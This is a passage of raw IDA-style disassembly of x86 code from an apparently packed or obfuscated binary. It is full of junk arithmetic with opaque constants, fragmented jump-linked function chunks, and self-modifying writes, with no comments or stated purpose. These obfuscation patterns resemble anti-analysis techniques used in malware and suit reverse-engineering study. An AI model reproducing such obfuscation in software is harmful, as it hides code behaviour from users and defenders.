; FUNCTION CHUNK AT 00447E91 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448EEF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449C13 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044A688 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044A971 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044ACE1 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044B0E4 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044CC85 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E92B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044F0B7 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044FF1B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450EEA SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00451185 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452EA8 SIZE 0000002A BYTES
; FUNCTION CHUNK AT 00456D16 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004571E9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045890A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458DB6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AAEB SIZE 00000009 BYTES
xchg ebx, [esp+0]
pop ebx
test eax, eax
jnz loc_44B0E4
jmp loc_439B81
sub_4524FE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E2E0
loc_45250F: ; CODE XREF: sub_44E2E0:loc_43B19Cj
jl loc_44F71E
loc_452515: ; CODE XREF: sub_446599+E91j
jmp loc_44604C
; END OF FUNCTION CHUNK FOR sub_44E2E0
; ---------------------------------------------------------------------------
loc_45251A: ; CODE XREF: ut7h7i2x:004418BCj
jmp loc_451849
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452D3D
loc_45251F: ; CODE XREF: sub_452D3D-13D4Dj
jmp sub_44C068
; END OF FUNCTION CHUNK FOR sub_452D3D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EF8B
loc_452524: ; CODE XREF: sub_43EF8B+3j
jmp nullsub_23
; END OF FUNCTION CHUNK FOR sub_43EF8B
; ---------------------------------------------------------------------------
adc esi, edi
add edx, 31318FA3h
mov [edi], edx
jmp loc_44F718
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_452538: ; CODE XREF: sub_43AB62:loc_454341j
mov edx, ebx
pop ebx
mov eax, [esp-8+arg_4]
push edx
call sub_444E04
mov eax, 0F2B89A19h
jmp loc_45AC8D
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
loc_45254E: ; CODE XREF: ut7h7i2x:0043A11Dj
ror eax, 11h
push edx
push 0D92ED482h
pop edx
add edx, 0EC848EB7h
xor edx, 31665B82h
jmp loc_44762F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_358. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_45256A: ; CODE XREF: sub_43FF65:loc_4462E3j
and ebx, ebp
mov ecx, [esi]
jg loc_43994A
jnz loc_4479C1
jmp loc_445C52
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45612F
loc_45257F: ; CODE XREF: sub_45612F+1Dj
and esi, 71E897E4h
add esi, 0F03BF0A4h
mov [esi], eax
pop esi
mov eax, [ebp-0Ch]
push 822540Eh
jmp loc_43CD75
; END OF FUNCTION CHUNK FOR sub_45612F
; ---------------------------------------------------------------------------
cmp edx, 0C8217458h
jmp loc_43F699
; ---------------------------------------------------------------------------
loc_4525A6: ; CODE XREF: ut7h7i2x:004444D8j
mov [eax], ecx
shl ebp, 10h
loc_4525AB: ; CODE XREF: ut7h7i2x:loc_45728Dj
push ebx
push 1BF46A6Dh
pop ebx
or ebx, 0C970BA3Dh
cmp ebx, 0EA273ED0h
jmp loc_43A3FA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D021
loc_4525C3: ; CODE XREF: sub_43D021:loc_4518FBj
jl loc_43F39D
loc_4525C9: ; CODE XREF: sub_453476+13j
jmp loc_444811
; END OF FUNCTION CHUNK FOR sub_43D021
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4505CE
loc_4525CE: ; CODE XREF: sub_4505CE+2E00j
jmp sub_45341C
; END OF FUNCTION CHUNK FOR sub_4505CE
; ---------------------------------------------------------------------------
mov ebp, [ebx]
jmp loc_43F38D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D1F0
loc_4525DA: ; CODE XREF: sub_44D1F0:loc_4394F7j
lea eax, dword_4502C4
push ebp
mov ebp, eax
xchg ebp, [esp+4+var_4]
jmp sub_439FD5
; END OF FUNCTION CHUNK FOR sub_44D1F0
; ---------------------------------------------------------------------------
mov eax, 0CAAB96A5h
call sub_43AED9
push offset sub_45A84B
jmp loc_458F50
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_523. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
locret_452600: ; CODE XREF: ut7h7i2x:004392ECj
retn
; ---------------------------------------------------------------------------
adc eax, edi
jmp loc_4504E6
; ---------------------------------------------------------------------------
loc_452608: ; CODE XREF: ut7h7i2x:004536E0j
test ebx, edx
jmp loc_4395DE
; ---------------------------------------------------------------------------
db 87h
dd 0F28A0FEFh, 0E9FFFEE3h, 0FFFFD4A6h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_45. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CA2D
loc_45261D: ; CODE XREF: sub_43CA2D:loc_44FFA4j
jmp sub_45A599
; END OF FUNCTION CHUNK FOR sub_43CA2D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445FA9
loc_452622: ; CODE XREF: sub_445FA9:loc_43E7B7j
and ecx, 39CBEDE0h
xor ecx, 3B583238h
and ecx, 0BCC1A56h
test ecx, 40000h
jmp loc_439DE0
; END OF FUNCTION CHUNK FOR sub_445FA9
; ---------------------------------------------------------------------------
loc_45263F: ; CODE XREF: ut7h7i2x:00448919j
jnb loc_4499E0
; START OF FUNCTION CHUNK FOR sub_449700
loc_452645: ; CODE XREF: sub_449700:loc_4402EBj
rol eax, 19h
cmp eax, 55B8EDF8h
jmp loc_447A0D
; END OF FUNCTION CHUNK FOR sub_449700
; =============== S U B R O U T I N E =======================================
sub_452653 proc near ; DATA XREF: ut7h7i2x:loc_454856o
; FUNCTION CHUNK AT 0043B3BA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043FB80 SIZE 00000005 BYTES
add eax, 13379E5Bh
mov eax, [eax]
or eax, eax
jnz loc_458FAF
jmp loc_43FB80
sub_452653 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43ADDB
loc_452668: ; CODE XREF: sub_43ADDB:loc_442230j
jge loc_44E27B
; END OF FUNCTION CHUNK FOR sub_43ADDB
; START OF FUNCTION CHUNK FOR sub_457E61
loc_45266E: ; CODE XREF: sub_457E61+18j
jmp sub_441DBB
; END OF FUNCTION CHUNK FOR sub_457E61
; ---------------------------------------------------------------------------
and esi, 0D81C1B5Fh
cmp ebp, esi
jmp loc_447832
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440493
loc_452680: ; CODE XREF: sub_440493+8617j
jz loc_44EE8C
jmp loc_43D3C6
; END OF FUNCTION CHUNK FOR sub_440493
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4489DF
loc_45268B: ; CODE XREF: sub_4489DF:loc_4457BBj
mov eax, [eax]
or eax, eax
jnz loc_43D93E
jmp loc_4520FA
; END OF FUNCTION CHUNK FOR sub_4489DF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4469B9
loc_45269A: ; CODE XREF: sub_4469B9:loc_43EE4Cj
xor ebx, eax
add ebx, 0D83F23E9h
jmp loc_45A563
; END OF FUNCTION CHUNK FOR sub_4469B9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442E16
loc_4526A7: ; CODE XREF: sub_442E16+79DEj
call sub_4508DB
and eax, ebp
jmp loc_43DCC7
; END OF FUNCTION CHUNK FOR sub_442E16
; ---------------------------------------------------------------------------
loc_4526B3: ; CODE XREF: ut7h7i2x:loc_43FABFj
; ut7h7i2x:loc_4507D7j
or esi, 6AF0D63Ch
sub esi, 28542D2h
xor esi, 705903h
add esi, 9843551Fh
xchg esi, [esp]
jmp loc_44222B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D2FA
loc_4526D3: ; CODE XREF: sub_44D2FA:loc_458168j
pop eax
xchg ebx, [esp+0]
mov edx, ebx
pop ebx
jmp loc_439EA6
; END OF FUNCTION CHUNK FOR sub_44D2FA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44865D
loc_4526DF: ; CODE XREF: sub_44865D:loc_439F35j
; sub_44865D-E719j
rol eax, 1Eh
jnb loc_43F9E9
; END OF FUNCTION CHUNK FOR sub_44865D
; START OF FUNCTION CHUNK FOR sub_43E9CB
loc_4526E8: ; CODE XREF: sub_43E9CB+BB8Aj
jmp nullsub_146
; END OF FUNCTION CHUNK FOR sub_43E9CB
; ---------------------------------------------------------------------------
add esi, 673FC247h
cmp ebp, 0C6999546h
loc_4526F9: ; CODE XREF: ut7h7i2x:0044ABB2j
jmp loc_450CF9
; ---------------------------------------------------------------------------
loc_4526FE: ; CODE XREF: ut7h7i2x:loc_451C3Dj
jl loc_459666
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_452704: ; CODE XREF: sub_442B3B+3296j
jmp loc_43E3DE
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
popf
or edi, 0F278D7Bh
cdq
mov ebx, 0EA7CFC71h
jmp loc_459666
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446CA0
loc_45271B: ; CODE XREF: sub_446CA0+B7B0j
add esp, 8
mov eax, [eax]
add eax, [ebp-4]
call sub_439B17
push ebx
jmp loc_44AFC8
; END OF FUNCTION CHUNK FOR sub_446CA0
; ---------------------------------------------------------------------------
loc_45272E: ; CODE XREF: ut7h7i2x:0044E117j
; ut7h7i2x:0045492Ej
jz loc_44FB11
jmp loc_44149A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B7F7
loc_452739: ; CODE XREF: sub_43B7F7:loc_457019j
; sub_43D021:loc_457B4Aj
mov eax, [ebp-4]
cmp byte ptr [eax], 0F1h
jnz loc_43E3BC
jmp loc_444772
; END OF FUNCTION CHUNK FOR sub_43B7F7
; ---------------------------------------------------------------------------
loc_45274A: ; CODE XREF: ut7h7i2x:00439A3Ej
pop edi
loc_45274B: ; CODE XREF: ut7h7i2x:loc_4516BBj
call sub_453D8B
call sub_44B7D3
; START OF FUNCTION CHUNK FOR sub_442C6B
loc_452755: ; CODE XREF: sub_442C6B+12j
jmp loc_43CBBD
; END OF FUNCTION CHUNK FOR sub_442C6B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4497C1
loc_45275A: ; CODE XREF: sub_4497C1-1EE5j
add ebx, 7716A88Ah
or ebx, 61194A9Eh
cmp ebx, 1029F8DEh
jmp loc_44FDE7
; END OF FUNCTION CHUNK FOR sub_4497C1
; ---------------------------------------------------------------------------
loc_452771: ; CODE XREF: ut7h7i2x:loc_439211j
sbb ecx, edx
jmp loc_45AAB5
; ---------------------------------------------------------------------------
loc_452778: ; CODE XREF: ut7h7i2x:004510A0j
ror ebp, 13h
jmp loc_45988D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_57. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4565B2
loc_452781: ; CODE XREF: sub_4565B2+11j
jmp loc_44721D
; END OF FUNCTION CHUNK FOR sub_4565B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445235
loc_452786: ; CODE XREF: sub_445235+10j
jmp loc_44C44B
; END OF FUNCTION CHUNK FOR sub_445235
; ---------------------------------------------------------------------------
loc_45278B: ; CODE XREF: ut7h7i2x:00447C01j
; ut7h7i2x:00447C1Dj
xor eax, 0A83A1FB0h
and eax, 392038BCh
xor eax, ds:4000F7h
add eax, 0E1B0769h
mov [eax], edx
pop eax
loc_4527A6: ; CODE XREF: ut7h7i2x:00441041j
; ut7h7i2x:004497DDj
xchg eax, edx
call sub_44ED9F
jmp loc_4483FB
; ---------------------------------------------------------------------------
db 68h, 9Bh, 0A2h
dd 0F881C45Ch, 0EC241F28h, 0FEECABE9h
db 0FFh
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_366. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EE57
loc_4527C2: ; CODE XREF: sub_44EE57:loc_44EE68j
call sub_445346
push 0C6567B3Dh
jmp sub_44AC75
; END OF FUNCTION CHUNK FOR sub_44EE57
; ---------------------------------------------------------------------------
loc_4527D1: ; CODE XREF: ut7h7i2x:0044B92Dj
rol eax, 0Ah
loc_4527D4: ; CODE XREF: ut7h7i2x:loc_448C94j
mov eax, [ebp-4]
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_4527D7: ; CODE XREF: sub_43FF65:loc_43CD24j
mov eax, [eax]
and eax, 0FFFFFFh
cmp eax, 0C3C033h
jnz loc_44DDE8
jmp loc_453776
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452361
loc_4527EE: ; CODE XREF: sub_452361:loc_440425j
mov edx, 0E996F72Eh
call sub_44ED9F
push offset sub_44F336
jmp nullsub_148
; END OF FUNCTION CHUNK FOR sub_452361
; =============== S U B R O U T I N E =======================================
sub_452802 proc near ; CODE XREF: sub_44445F-448Dp
; ut7h7i2x:004419B5j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0043C03A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D6A9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004410BC SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004410D1 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044497E SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00446933 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00447E6B SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00455E40 SIZE 00000005 BYTES
xchg ecx, [esp-4+arg_0]
pop ecx
cmp eax, edi
pop edi
push 30C47141h
jmp loc_43D6A9
sub_452802 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_452813: ; CODE XREF: ut7h7i2x:0043A6C5j
cdq
; =============== S U B R O U T I N E =======================================
sub_452814 proc near ; CODE XREF: sub_44E66A+14p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00441E6C SIZE 00000018 BYTES
xchg edi, [esp+0]
pop edi
xchg ecx, [esp-4+arg_0]
pushf
push 964DCA8h
pop eax
jmp loc_441E6C
sub_452814 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444E04
loc_452827: ; CODE XREF: sub_444E04:loc_446594j
mov [ebp+var_4], eax
push 0F88D4858h
pop eax
add eax, 4274A760h
jmp loc_453ADD
; END OF FUNCTION CHUNK FOR sub_444E04
; ---------------------------------------------------------------------------
loc_45283B: ; CODE XREF: ut7h7i2x:00457D52j
sbb ebp, 0C5106987h
adc esi, ebx
or eax, 4B2BA94Bh
; START OF FUNCTION CHUNK FOR sub_448CED
loc_452849: ; CODE XREF: sub_448CED:loc_457D3Cj
add ecx, 0DE45FB41h
mov [ecx], eax
pop ecx
jmp nullsub_499
; END OF FUNCTION CHUNK FOR sub_448CED
; =============== S U B R O U T I N E =======================================
sub_452857 proc near ; CODE XREF: sub_43F117j
; FUNCTION CHUNK AT 00451E60 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456076 SIZE 0000000A BYTES
push ebp
jmp loc_456076
sub_452857 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4529E0
loc_45285D: ; CODE XREF: sub_4529E0+48F5j
jz loc_449A52
loc_452863: ; CODE XREF: ut7h7i2x:004446F2j
jmp sub_44A833
; END OF FUNCTION CHUNK FOR sub_4529E0
; ---------------------------------------------------------------------------
or eax, esi
jbe loc_44F8D1
sub ecx, 0ABE9F5DAh
jmp loc_449A47
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44825D
loc_45287B: ; CODE XREF: sub_44825D+12ACDj
jnb loc_440A2F
mov [ebx], eax
jle loc_454142
loc_452889: ; CODE XREF: sub_44825D:loc_442F6Cj
mov eax, [ebp-4]
cmp byte ptr [eax], 0F1h
jnz loc_43CDAD
jmp loc_446D9E
; END OF FUNCTION CHUNK FOR sub_44825D
; ---------------------------------------------------------------------------
loc_45289A: ; CODE XREF: ut7h7i2x:004473B2j
jl loc_457202
push 0F91088DDh
; =============== S U B R O U T I N E =======================================
sub_4528A5 proc near ; CODE XREF: sub_440B52+15EDCp
arg_0 = dword ptr 4
xchg ecx, [esp+0]
pop ecx
xchg ebx, [esp-4+arg_0]
jmp loc_43B98A
sub_4528A5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4528B1 proc near ; CODE XREF: sub_44E2E0:loc_44E128p
; sub_43DD17+10437p
; FUNCTION CHUNK AT 00440CDF SIZE 00000002 BYTES
call sub_43F094
loc_4528B6: ; CODE XREF: sub_43F82A+19j
jmp loc_440CDF
sub_4528B1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B72F
loc_4528BB: ; CODE XREF: sub_44B72F+15j
xor eax, 0D8AFB609h
rol eax, 1Fh
sub eax, 689384ACh
loc_4528CA: ; CODE XREF: ut7h7i2x:004441C4j
jnb loc_44ED03
loc_4528D0: ; CODE XREF: ut7h7i2x:00439523j
; ut7h7i2x:0044D7EFj
jmp loc_44FD03
; END OF FUNCTION CHUNK FOR sub_44B72F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4519D2
loc_4528D5: ; CODE XREF: sub_4519D2-C92Bj
jmp loc_4519CA
; END OF FUNCTION CHUNK FOR sub_4519D2
; ---------------------------------------------------------------------------
sbb ebp, 56DC8C82h
jmp loc_43EC08
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_4528E5: ; CODE XREF: sub_43DBEC:loc_4438D0j
test ebp, 365FCD13h
jmp loc_43A6DD
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45967C
loc_4528F0: ; CODE XREF: sub_45967C-CFFj
pushf
push 638F0D13h
pop esi
and esi, 0B8AE52B0h
xor esi, 63D90E70h
and esi, 19D67A52h
jnz loc_43BB42
loc_45290F: ; CODE XREF: sub_44124A+17A46j
jmp nullsub_385
; END OF FUNCTION CHUNK FOR sub_45967C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4561E9
loc_452914: ; CODE XREF: sub_4561E9+17j
jmp nullsub_331
; END OF FUNCTION CHUNK FOR sub_4561E9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CAB9
loc_452919: ; CODE XREF: sub_44CAB9+64A2j
jmp sub_44ED9F
; END OF FUNCTION CHUNK FOR sub_44CAB9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A070
loc_45291E: ; CODE XREF: sub_45A070-114D7j
jmp sub_44A833
; END OF FUNCTION CHUNK FOR sub_45A070
; ---------------------------------------------------------------------------
xchg ebx, esi
jmp loc_43D88B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_122. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_45292B proc near ; CODE XREF: sub_4471CA-942Ep
; sub_4459EE+4p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0043B43D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D05F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043D27B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044429A SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00444E2A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446514 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044AF7C SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044EC3F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452EDD SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045431F SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0045625C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457512 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004583AB SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045AD3A SIZE 00000021 BYTES
push ebp
mov ebp, esp
jno loc_446514
add esp, 0FFFFFFF8h
jmp loc_43B43D
sub_45292B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44AC40
loc_45293C: ; CODE XREF: sub_44AC40:loc_43FA41j
jz loc_44FA94
pushf
xchg edi, ebp
xchg edi, [eax]
xor edx, esi
mov [eax], ebx
jmp loc_44FA94
; END OF FUNCTION CHUNK FOR sub_44AC40
; =============== S U B R O U T I N E =======================================
sub_452950 proc near ; CODE XREF: sub_43F3D1+6p
; ut7h7i2x:004567A0j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043E3CC SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043FF16 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CD3B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458732 SIZE 0000000A BYTES
xchg ebx, [esp+4+var_4]
pop ebx
push ebx
loc_452955: ; CODE XREF: ut7h7i2x:loc_44581Cj
mov ebx, ebp
xchg ebx, [esp+4+var_4]
jmp loc_44CD3B
sub_452950 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D5DC
loc_45295F: ; CODE XREF: sub_44D5DC:loc_4390A5j
sub eax, 1DBD1804h
add eax, 4E38F532h
popf
push ecx
pushf
push 61F1FDAh
pop ecx
xor ecx, 33480801h
jmp loc_43C16C
; END OF FUNCTION CHUNK FOR sub_44D5DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E700
loc_45297F: ; CODE XREF: ut7h7i2x:0044838Bj
; sub_43E700:loc_44C807j
rol ebx, 13h
add ebx, 8CEAFA1Eh
or ebx, 793E4637h
add ebx, 8305E19Dh
xchg ebx, [esp+4+var_4]
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_43E700
; ---------------------------------------------------------------------------
mov ds:off_41D098, eax
jmp loc_43E7E7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439701
loc_4529A7: ; CODE XREF: sub_439701+E847j
jnz loc_439408
jmp loc_45A2C0
; END OF FUNCTION CHUNK FOR sub_439701
; ---------------------------------------------------------------------------
loc_4529B2: ; CODE XREF: ut7h7i2x:00446539j
jz loc_43F851
jmp loc_4394A5
; ---------------------------------------------------------------------------
mov eax, 851AF986h
call sub_45854D
push edi
push 4BABD1C1h
pop edi
xor edi, 50E0597Fh
jmp loc_4548E9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D021
loc_4529D9: ; CODE XREF: sub_43D021+2F05j
test ecx, ebp
jmp loc_43F8BC
; END OF FUNCTION CHUNK FOR sub_43D021
; =============== S U B R O U T I N E =======================================
sub_4529E0 proc near ; DATA XREF: sub_44F10F+Co
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00439937 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043B863 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C9B2 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043CB97 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043D137 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043E680 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442EB8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443A92 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443F80 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044405D SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00445882 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004461DB SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00449258 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00449A52 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044EB15 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00450D2F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00450FAE SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00451780 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00451FC0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452482 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045285D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452E74 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004572CF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457F6B SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00458B20 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0045AD5B SIZE 00000012 BYTES
or eax, eax
jnz loc_450FAE
jmp loc_442EB8
sub_4529E0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4529ED proc near ; CODE XREF: ut7h7i2x:0043FCCDj
; ut7h7i2x:loc_44EE28p
; FUNCTION CHUNK AT 0044AC27 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
mov ds:dword_41D144, eax
lea eax, nullsub_14
mov byte ptr [eax], 0C3h
jmp loc_44AC27
sub_4529ED endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push offset loc_44547A
jmp locret_45ACDC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C1D2
loc_452A0F: ; CODE XREF: sub_43C1D2-302Aj
jl loc_458B8D
; END OF FUNCTION CHUNK FOR sub_43C1D2
; START OF FUNCTION CHUNK FOR sub_445A8C
loc_452A15: ; CODE XREF: sub_445A8C+8j
jmp loc_44D206
; END OF FUNCTION CHUNK FOR sub_445A8C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B5CF
loc_452A1A: ; CODE XREF: sub_44B5CF:loc_4440BFj
rol ebp, 0Dh
xor esi, eax
pushf
ror edx, 6
jl loc_455BA2
jmp loc_458B8D
; END OF FUNCTION CHUNK FOR sub_44B5CF
; ---------------------------------------------------------------------------
mov eax, ecx
jmp sub_44BCCB
; ---------------------------------------------------------------------------
locret_452A35: ; CODE XREF: ut7h7i2x:0044006Dj
retn
; ---------------------------------------------------------------------------
loc_452A36: ; DATA XREF: ut7h7i2x:00439491o
popf
movzx eax, word ptr [eax+14h]
push edi
push 5B1BAFEEh
pop edi
jmp loc_442831
; ---------------------------------------------------------------------------
mov edx, eax
jmp loc_445E98
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_452A4E: ; CODE XREF: sub_4459EE+14984j
pop edx
locret_452A4F: ; CODE XREF: sub_43FA90:loc_43FA97j
retn
; END OF FUNCTION CHUNK FOR sub_4459EE
; =============== S U B R O U T I N E =======================================
sub_452A50 proc near ; CODE XREF: sub_45A35D+9p
call sub_444C53
sub_452A50 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_4442CC
loc_452A55: ; CODE XREF: sub_4442CC+938Bj
jmp sub_44F852
; END OF FUNCTION CHUNK FOR sub_4442CC
; ---------------------------------------------------------------------------
loc_452A5A: ; CODE XREF: ut7h7i2x:004435A1j
jmp loc_44761E
; ---------------------------------------------------------------------------
loc_452A5F: ; CODE XREF: ut7h7i2x:0043A2ACj
jmp loc_441548
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44865D
loc_452A64: ; CODE XREF: sub_44865D:loc_43EA9Cj
or edi, 80E8B4A7h
xor edi, 0A7E9B4BFh
popf
xchg edi, [esp+0]
push eax
jmp loc_44728B
; END OF FUNCTION CHUNK FOR sub_44865D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_452A7A: ; CODE XREF: sub_439BD1+1D4B5j
cmp ebx, 0C6B2E46h
jmp loc_458F6C
; END OF FUNCTION CHUNK FOR sub_439BD1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F738
loc_452A85: ; CODE XREF: sub_44F738+671j
jz loc_44C55A
jmp loc_45AB62
; END OF FUNCTION CHUNK FOR sub_44F738
; ---------------------------------------------------------------------------
push ebp
mov ebp, eax
xchg ebp, [esp]
ror eax, 6
mov ds:dword_44A898, eax
loc_452A9F: ; CODE XREF: ut7h7i2x:0044B760j
jmp loc_44689C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440493
loc_452AA4: ; CODE XREF: sub_440493j
push eax
mov eax, ebp
xchg eax, [esp+4+var_4]
jmp loc_443493
